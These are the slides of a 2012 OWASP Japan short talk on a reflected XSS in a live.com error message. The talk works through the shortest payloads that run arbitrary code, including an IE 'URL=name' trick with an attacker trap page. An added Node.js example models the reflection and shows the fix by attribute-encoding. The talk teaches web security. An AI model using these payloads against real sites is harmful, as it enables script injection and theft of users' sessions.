OWASP Japan 2nd local chapter meeting
Short talk of XSS (in Japanese: a talk about short XSS)
Jun 27 2012, Yosuke HASEGAWA
One day
As always, I was surfing websites,
and just as usual, an XSS was found.
First of all, view-source:
What is this!?
<!-- Version: "13.000.20177.00" Server: BAYIDSLEG1C38; DateTime: 2012/05/01 15:13:23 --><input type="hidden" value="MESSAGE: A potentially dangerous Request.QueryString value was detected from the client (param="><h1>XSSed</h1><!--").SOURCE: System.Web FORM:" />
https://*.live.com/?param=><h1>XSSed</h1><!--
XSS caused by an unnecessary error message
Microsoft “live.com”, over https, with a needless error message.
Interesting, but that doesn't matter right now.
Why not “alert”?
alert is common knowledge for XSSers.
Reason
22 letters max.
><h1>XSSed</h1><!-- … 19 letters
XSS in 22 letters or fewer is too hard:
><script>alert(1)</script> … 26 letters
><script>eval(name)</script> … 28 letters
How many letters does it take to run arbitrary code via XSS?
XSS Golf: Shortest XSS Challenges, by Gareth Heyes
<x/x=&{eval(name)}; … 19 letters (@0x6D6172696F, Netscape 4 only)
<svg/onload=eval(name) … 22 letters (@0x6D6172696F)
Back to that XSS.
22 letters max.: ><h1>XSSed</h1><!-- … 19 letters
Impossible? No!
IE has a writable “URL” property
In IE, assigning to document.URL navigates the page like location does, and inside an inline event handler the bare name URL resolves to document.URL, so this fits:
><i/onclick=URL=name> … 21 letters
The code itself is read from window.name, which the attacker controls from a trap page:
// Trap page created by attacker
<iframe src="target" name="javascript:alert(1)">
// or use window.open from JavaScript
(Mario Heiderich’s work)
Did it! (XSS Filter is disabled)
Variations
With 22 letters, arbitrary code can be run. The payload length depends on how the reflected value is quoted (the trailing > in each template is the original tag's own):
<input type=hidden value=><i/onclick=URL=name> … payload ><i/onclick=URL=name, 20 letters (the original > closes the <i>)
<input type=text value= onclick=URL=name> … payload " onclick=URL=name" (leading space), 17 letters (no need to leave the tag)
<input type=hidden value=""><i/onclick=URL=name>"> … payload "><i/onclick=URL=name>, 22 letters
Run arbitrary code in 22 letters
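To make the reflection and the length budget concrete, here is an added example in Node.js; it is not from the talk and not live.com's code. It rebuilds the vulnerable hidden-input rendering from the error-message text on the slides, runs the slide's candidate payloads through a minimal tag scanner to see which ones actually leave the attribute and add an element with an on* handler, applies the 22-letter budget the slides state, and shows the fix: attribute-encoding the reflected value. The param name "param", the hard 22-letter cut-off and the scanner itself are assumptions for illustration.

```javascript
// Added example, not from the talk or from live.com: model the reflected error message,
// check each candidate payload against the 22-letter budget from the slides, and show the
// hardened rendering. The message text is copied from the slide HTML; the param name,
// the hard cut-off and the scanner are illustrative assumptions.

const MAX_LEN = 22; // budget stated on the slides (assumed here as a hard limit)

// The ASP.NET-style message: the offending value is wrapped in (param="value").
function errorMessage(param, value) {
  return 'MESSAGE: A potentially dangerous Request.QueryString value was detected ' +
    `from the client (${param}="${value}").SOURCE: System.Web FORM:`;
}

// Vulnerable: the raw message goes into a hidden input. The '"' after param= comes
// from the message itself, so a value starting with '>' lands outside the attribute
// and outside the <input> tag.
function renderVulnerable(param, value) {
  return `<input type="hidden" value="${errorMessage(param, value)}" />`;
}

// Hardened: encode the characters that matter inside an attribute before emitting.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function renderFixed(param, value) {
  return `<input type="hidden" value="${escapeAttr(errorMessage(param, value))}" />`;
}

// Minimal tag scanner: which tags does the browser see, and which carry an on*
// attribute? Quoted attribute values are skipped, and a '<!--' with no matching
// '-->' swallows everything after it, as in a real parser.
function scanTags(html) {
  const tags = [];
  let i = 0;
  while (i < html.length) {
    if (html.startsWith('<!--', i)) {
      const end = html.indexOf('-->', i + 4);
      i = end === -1 ? html.length : end + 3;
      continue;
    }
    const m = /^<(\/?[a-zA-Z][a-zA-Z0-9]*)/.exec(html.slice(i));
    if (!m) { i += 1; continue; }
    let j = i + m[0].length;
    let quote = null;
    let attrText = ''; // tag contents outside quoted values
    for (; j < html.length; j += 1) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; continue; }
      if ((c === '"' || c === "'") && html[j - 1] === '=') { quote = c; continue; }
      if (c === '>') break;
      attrText += c;
    }
    const handlers = (attrText.match(/\bon[a-z]+(?==)/gi) || []).map((h) => h.toLowerCase());
    tags.push({ name: m[1].toLowerCase(), handlers });
    i = j + 1;
  }
  return tags;
}

// Report for one payload: does it fit the budget, and what does it add to the page?
function analyze(render, payload) {
  const injected = scanTags(render('param', payload))
    .filter((t) => t.name !== 'input' && !t.name.startsWith('/'));
  return {
    length: payload.length,
    fits: payload.length <= MAX_LEN,
    injectedTags: injected.map((t) => t.name),
    handlers: injected.flatMap((t) => t.handlers),
  };
}

// Candidate payloads from the slides.
const CANDIDATES = [
  '><h1>XSSed</h1><!--',
  '><script>alert(1)</script>',
  '><script>eval(name)</script>',
  '><i/onclick=URL=name>',
];

for (const p of CANDIDATES) {
  console.log(p, 'vulnerable:', JSON.stringify(analyze(renderVulnerable, p)));
  console.log(' '.repeat(p.length), 'fixed:     ', JSON.stringify(analyze(renderFixed, p)));
}
```

Running it shows the two script payloads escaping the attribute but failing the budget, the 19-letter h1 payload escaping and hiding the rest of the tag behind the open comment, and the 21-letter i/onclick payload both fitting and adding an element with an event handler; with renderFixed no payload adds any tag at all, because the only way out of the attribute was the unencoded quote.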
Shortest JavaScript to run arbitrary code
eval(name) … 10 letters
eval(URL) … 9 letters
URL=name … 8 letters (IE)
$(URL) … 6 letters (with jQuery)
NetAgent, http://www.netagent.co.jp/ (OWASP Japan 2nd local chapter meeting)
Questions?
[email protected]@netagent.co.jp
@hasegawayosuke
http://utf-8.jp/